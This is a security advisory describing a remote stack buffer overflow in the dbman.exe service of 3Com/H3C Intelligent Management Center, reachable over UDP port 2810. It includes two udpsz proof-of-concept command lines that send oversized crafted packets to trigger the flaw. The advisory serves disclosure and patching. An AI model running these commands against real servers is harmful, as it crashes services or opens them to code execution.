#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          stack overflow in dbman.exe
Exploitation: remote, versus server
Date:         probably found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"3ComŽ Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."
The suite is also known under the vendors HP and H3C (the original
developer).


#######################################################################

======
2) Bug
======


dbman.exe is a service running on UDP port 2810 and available in the
default configuration of IMC.

The service is vulnerable to a stack buffer-overflow in the function
that handles the incoming packets and uses vsprintf on a buffer of
about 4 kilobytes for building the following log to place in
dbman_debug.log where all the arguments are controlled by the attacker:

  "execute command issued by ip=%u,port=%u,operator='%s'"

The interesting thing is that the service uses a recv of 0x1024 bytes
but handles only the packets having a size of 0x1000 bytes reusing ever
the same input buffer raising the amount of bytes usable in the
overflow.

Note that on Windows the "stack canary" doesn't allow the execution of
code (Denial of Service only) so only Solaris and Linux are affected by
this vulnerability.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

  udpsz -C "f7103d21 ffff ffffffffffffffffffffffffffffffff 0101 ffffffff ffff" -b 0x61 SERVER 2810 0x1024
and then:
  udpsz -C "f7103d21 ffff ffffffffffffffffffffffffffffffff 0101 ffffffff ffff" -b 0x61 SERVER 2810 0x1000


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-11-162


#######################################################################